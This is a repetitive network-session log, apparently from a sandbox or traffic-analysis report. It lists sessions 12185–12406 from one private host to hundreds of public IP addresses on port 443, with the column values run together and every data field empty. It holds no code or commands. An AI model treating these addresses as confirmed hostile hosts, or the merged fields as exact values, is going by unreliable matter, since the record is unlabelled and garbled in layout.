                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12185192.168.2.1357286169.47.191.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12186192.168.2.1336512128.156.207.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12187192.168.2.134320870.182.249.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12188192.168.2.135672498.141.87.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12189192.168.2.1355074182.90.83.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12190192.168.2.1345106222.212.76.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12191192.168.2.1348734102.133.186.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12192192.168.2.1338178199.102.52.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12193192.168.2.134014832.174.254.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12194192.168.2.1340508150.44.146.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12195192.168.2.133866045.144.1.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12196192.168.2.1360594191.185.255.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12197192.168.2.134139025.3.250.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12198192.168.2.135547266.24.53.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12199192.168.2.1338258156.17.78.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12200192.168.2.1359026191.84.229.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12201192.168.2.13492264.21.36.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12202192.168.2.133460447.133.197.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12203192.168.2.1356326189.84.145.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12204192.168.2.1338348170.204.92.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12205192.168.2.134318882.116.14.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12206192.168.2.135488680.80.235.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12207192.168.2.135846693.59.174.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12208192.168.2.135986480.124.84.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12209192.168.2.135662417.183.175.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12210192.168.2.135932825.112.31.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12211192.168.2.135361823.97.20.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12212192.168.2.13532841.145.252.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12213192.168.2.1343692183.59.164.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12214192.168.2.1357488156.197.232.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12215192.168.2.134481885.247.23.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12216192.168.2.134971460.134.88.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12217192.168.2.1341850199.198.37.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12218192.168.2.1360080116.139.202.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12219192.168.2.1345456181.93.49.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12220192.168.2.135551242.212.196.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12221192.168.2.1339804131.135.31.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12222192.168.2.135731232.109.255.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12223192.168.2.1356032162.22.191.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12224192.168.2.1356018145.97.172.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12225192.168.2.1348452158.70.190.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12226192.168.2.1347754210.176.218.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12227192.168.2.1350172119.148.223.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12228192.168.2.1345804104.19.254.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12229192.168.2.134395267.73.167.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12230192.168.2.133566463.8.75.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12231192.168.2.136020018.228.28.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12232192.168.2.1344414186.1.88.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12233192.168.2.136008047.105.147.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12234192.168.2.134509835.154.36.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12235192.168.2.1337598175.139.152.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12236192.168.2.134211635.70.47.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12237192.168.2.134190693.238.185.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12238192.168.2.1343274149.1.79.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12239192.168.2.133558419.46.223.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12240192.168.2.1333794223.112.248.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12241192.168.2.1345654199.134.66.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12242192.168.2.1341770107.49.116.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12243192.168.2.133858659.85.156.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12244192.168.2.1340870175.131.161.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12245192.168.2.1356456216.205.187.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12246192.168.2.1353932188.235.17.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12247192.168.2.1351370175.239.104.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12248192.168.2.1345018143.172.147.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12249192.168.2.1333498189.217.174.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12250192.168.2.1348764125.0.121.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12251192.168.2.1353996162.252.28.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12252192.168.2.134178640.110.227.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12253192.168.2.1334022132.102.203.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12254192.168.2.135199484.16.34.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12255192.168.2.1355718118.184.236.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12256192.168.2.1341202222.162.191.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12257192.168.2.133321691.140.12.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12258192.168.2.135053425.17.125.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12259192.168.2.1350100206.201.84.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12260192.168.2.1341564197.226.203.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12261192.168.2.1339928182.124.252.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12262192.168.2.134463442.35.0.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12263192.168.2.1351580113.182.165.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12264192.168.2.1358262211.36.138.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12265192.168.2.1355814134.152.236.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12266192.168.2.1354160178.3.18.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12267192.168.2.133280879.210.68.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12268192.168.2.13478884.226.130.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12269192.168.2.1355932168.79.207.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12270192.168.2.1337680172.75.26.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12271192.168.2.133351864.159.106.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12272192.168.2.1336340186.37.166.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12273192.168.2.1350798201.107.14.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12274192.168.2.1340178210.93.37.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12275192.168.2.1346776199.244.159.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12276192.168.2.1345502222.46.154.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12277192.168.2.135930896.202.161.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12278192.168.2.135636672.41.5.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12279192.168.2.1339214118.154.164.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12280192.168.2.133962296.239.75.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12281192.168.2.1354640102.215.236.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12282192.168.2.1360676149.44.228.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12283192.168.2.135858091.178.246.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12284192.168.2.1351976132.56.57.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12285192.168.2.1344216125.224.141.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12286192.168.2.1345482181.63.111.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12287192.168.2.1352740192.15.48.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12288192.168.2.133424265.77.202.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12289192.168.2.1336704219.0.51.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12290192.168.2.1344562217.44.178.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12291192.168.2.1350220129.50.188.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12292192.168.2.134575666.6.19.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12293192.168.2.135522849.112.119.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12294192.168.2.1348316196.206.42.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12295192.168.2.133960419.16.71.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12296192.168.2.1336538131.191.92.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12297192.168.2.136078091.234.61.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12298192.168.2.134161454.139.57.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12299192.168.2.134601042.205.173.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12300192.168.2.1338474133.17.8.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12301192.168.2.1356404203.149.134.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12302192.168.2.134025681.41.75.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12303192.168.2.135404688.57.106.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12304192.168.2.135275096.145.245.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12305192.168.2.1356340119.202.38.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12306192.168.2.133682653.188.15.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12307192.168.2.1357694103.25.65.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12308192.168.2.135981034.50.86.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12309192.168.2.1354040177.93.101.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12310192.168.2.1345460118.241.178.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12311192.168.2.1346964189.242.113.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12312192.168.2.1333670144.111.239.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12313192.168.2.1349840139.195.249.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12314192.168.2.134756098.183.27.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12315192.168.2.1343174143.205.25.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12316192.168.2.1332872163.97.226.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12317192.168.2.1351000130.179.94.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12318192.168.2.1344632121.109.34.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12319192.168.2.1357232117.0.38.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12320192.168.2.1350710110.56.59.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12321192.168.2.1350538194.214.97.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12322192.168.2.135168669.220.127.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12323192.168.2.1356944140.200.174.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12324192.168.2.1351808161.223.219.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12325192.168.2.1334910196.157.79.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12326192.168.2.1353388139.142.13.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12327192.168.2.133352864.165.209.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12328192.168.2.135626849.37.218.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12329192.168.2.135377896.23.166.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12330192.168.2.1349026102.36.197.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12331192.168.2.133939053.220.135.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12332192.168.2.1336196144.181.227.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12333192.168.2.1346974126.217.28.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12334192.168.2.1336460132.155.67.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12335192.168.2.1339332174.143.204.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12336192.168.2.1342444199.7.249.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12337192.168.2.1351516139.238.59.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12338192.168.2.135774484.17.142.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12339192.168.2.1357782122.190.146.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12340192.168.2.135467839.111.99.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12341192.168.2.1359604151.157.120.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12342192.168.2.134918423.224.130.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12343192.168.2.1359892196.78.59.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12344192.168.2.1355752212.220.34.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12345192.168.2.133800272.240.77.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12346192.168.2.134133896.183.255.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12347192.168.2.1348142123.52.41.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12348192.168.2.1339812108.233.34.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12349192.168.2.1346376139.30.213.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12350192.168.2.1350628148.103.137.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12351192.168.2.1352514158.137.39.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12352192.168.2.135743659.110.187.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12353192.168.2.1353580107.165.135.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12354192.168.2.1334016151.180.86.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12355192.168.2.1359168181.105.5.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12356192.168.2.135243650.254.145.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12357192.168.2.133560895.35.2.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12358192.168.2.133285218.129.169.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12359192.168.2.135564236.240.119.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12360192.168.2.134346420.90.92.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12361192.168.2.1360918113.35.58.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12362192.168.2.133502697.216.29.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12363192.168.2.13372665.207.64.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12364192.168.2.134762239.29.1.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12365192.168.2.1359850123.233.189.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12366192.168.2.1339186113.50.25.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12367192.168.2.133976614.231.187.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12368192.168.2.1340442209.127.63.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12369192.168.2.134572858.228.10.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12370192.168.2.1345810223.130.116.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12371192.168.2.1334604117.21.231.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12372192.168.2.1344388210.227.176.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12373192.168.2.1335972125.44.60.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12374192.168.2.135484238.61.7.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12375192.168.2.1351170152.192.74.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12376192.168.2.1355870175.60.216.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12377192.168.2.133928024.229.53.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12378192.168.2.1359984189.178.209.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12379192.168.2.135827278.15.228.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12380192.168.2.1357622112.113.194.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12381192.168.2.133502482.113.29.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12382192.168.2.1346810106.127.217.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12383192.168.2.134228872.180.205.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12384192.168.2.133895870.169.96.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12385192.168.2.1349906185.58.20.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12386192.168.2.1339452116.88.223.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12387192.168.2.1354570130.165.61.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12388192.168.2.1335902154.160.75.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12389192.168.2.1334766178.28.228.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12390192.168.2.1354730186.176.58.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12391192.168.2.1360692120.92.102.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12392192.168.2.1339982168.58.191.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12393192.168.2.1350316101.107.156.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12394192.168.2.13459665.146.185.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12395192.168.2.135104847.251.171.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12396192.168.2.1351792152.15.73.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12397192.168.2.134365688.166.99.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12398192.168.2.133388812.192.206.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12399192.168.2.1352606103.141.231.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12400192.168.2.1353506207.78.35.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12401192.168.2.1352024101.55.92.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12402192.168.2.135288454.54.73.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12403192.168.2.1346680144.181.172.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12404192.168.2.1342884106.140.95.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12405192.168.2.1342578116.14.54.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12406192.168.2.1338752209.248.124.2443
